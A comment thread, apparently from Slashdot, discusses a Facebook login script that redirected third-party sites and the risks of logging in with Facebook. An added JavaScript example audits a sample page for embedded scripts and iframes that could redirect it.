Nyder (754090) | about a year and a half ago | (#42831901)

I never use another site to log into a different site. Sure, Facebook is big today, but this is the internet, this is technology. Myspace? Geocities?

What do you do when FB for whatever reason, suddenly stops? All those sites you used to use facebook to log in, you can't get in. You think FB is going to care when their stock is going for pennies?

My suggestion, don't use other sites to handle your log in for you.

My other suggestion: FB is a troll, quit feeding it.

Re:clear skies fuck you up (1)

omnichad (1198475) | about a year and a half ago | (#42832241)

I participate in comment discussion on the Gawker blogs - Lifehacker, particularly. They took away their own login system after they screwed it up so badly they gave away everyone's password. The community there is nice, but the site owners are stupid. I say, please let them use Facebook. When Facebook stops? They'll give me a way to transition to whatever they choose next.

Of course, if I have a choice, I don't log in with Facebook.

But I believe that Facebook Connect provides enough demographic info back to the site (your email address) that your profile can be rejoined with a new authentication system fairly easily - even if Facebook just disappears at once without any transition period.

A Javascript problem, really (1)

omnichad (1198475) | about a year and a half ago | (#42832161)

Javascript has been putting in security restrictions for a while now. You can't open a new window without a user click. Most browsers now block automatic window popups.

Why are we still allowing something as archaic as a Javascript redirect? We already have meta tags and HTTP header redirects. We don't need browser navigation without a click to exist in Javascript.

Sure, you could blame Facebook - they did put out a bad script, but the fact that this is even possible is really on the browser makers.
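The failure mode discussed in the comments above (third-party login code embedded in a page navigating that page away), seen from the embedding site's side, as an added example that is not part of the thread. It audits a constructed sample page for third-party embeds that are able to redirect the top-level window without a click; the host names and the `auditEmbeds` helper are hypothetical.

```javascript
// Added example, not code from the thread. SAMPLE_PAGE is constructed and the
// host names are placeholders.
const SAMPLE_PAGE = `
<script src="/static/app.js"></script>
<script src="https://connect.social.example/sdk.js"></script>
<iframe src="https://widgets.social.example/like" sandbox="allow-scripts allow-same-origin"></iframe>
<iframe src="https://login.social.example/button" sandbox="allow-scripts allow-top-navigation"></iframe>
<iframe src="https://comments.example.net/thread"></iframe>
`;

// Return the value of a double-quoted attribute, or null if absent.
function attr(tag, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*"([^"]*)"`, "i").exec(tag);
  return m ? m[1] : null;
}

// Can this iframe redirect the top-level window without a user gesture?
function canAutoNavigateTop(tag) {
  const bare = tag.replace(/"[^"]*"/g, '""');            // ignore attribute values
  // No sandbox attribute: the frame is not restricted by sandboxing (whether a
  // gesture is still required is browser-dependent), so treat it as risky.
  if (!/\ssandbox(?=[\s=>])/i.test(bare)) return true;
  const tokens = (attr(tag, "sandbox") || "").toLowerCase().split(/\s+/);
  // Only allow-top-navigation permits it; the -by-user-activation variant needs a click.
  return tokens.includes("allow-top-navigation");
}

// List third-party scripts and frames and flag those able to redirect the page.
function auditEmbeds(html, pageHost) {
  const findings = [];
  for (const m of html.matchAll(/<(script|iframe)\b[^>]*>/gi)) {
    const tag = m[0];
    const kind = m[1].toLowerCase();
    const src = attr(tag, "src");
    if (!src) continue;                                   // inline script or empty frame
    const host = new URL(src, `https://${pageHost}/`).host;
    if (host === pageHost) continue;                      // first-party, out of scope
    // A <script src> runs with the embedding page's own privileges, so it can
    // always assign window.location; an iframe depends on its sandbox tokens.
    const risky = kind === "script" ? true : canAutoNavigateTop(tag);
    findings.push({ kind, host, risky });
  }
  return findings;
}

console.table(auditEmbeds(SAMPLE_PAGE, "news.example"));
```

Only the frame sandboxed without `allow-top-navigation` is reported as unable to redirect the page on its own; the directly included SDK script is always flagged because it executes as part of the host page.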

Ran into this. Only happened if I was logged in (1)

Christianfreak (100697) | about a year and a half ago | (#42832583)

I was getting this yesterday when reading an article on Mashable. I noticed that it stopped doing it by logging out of Facebook. Probably something I should be doing anyway to prevent them from tracking me all over the place.

And . . . (1)

hduff (570443) | about a year and a half ago | (#42833363)

. . . nothing of value was lost.

Facebook is a fun distraction but protect yourself (1)

ohcrapitssteve (1185821) | about a year and a half ago | (#42833783)

Protecting yourself against weird things Facebook does is actually fairly simple. I sandbox FB in its own browser. It's all I use Firefox for, that and the occasional browser compatibility test, but I reset cookies/cache/etc before and after. Combine that with a fake name and you're largely safe to post whatever you want. Won't fool, like, law enforcement or whatever if they look specifically at you, but it will confuse whatever automated ad/cross site dossier these companies are compiling on you. I tie it to the dumpster gmail address I use when I know I'm going to get spammed (drop in your biz card, win a free happy hour!) and bam, I don't even think I've ever touched the privacy settings menu.

"Quickly Resolved"...? (1)

InvisibleClergy (1430277) | about a year and a half ago | (#42834009)

I noticed this several times across a span of 9 hours, from first notice to last notice. I would hardly call that "quick".
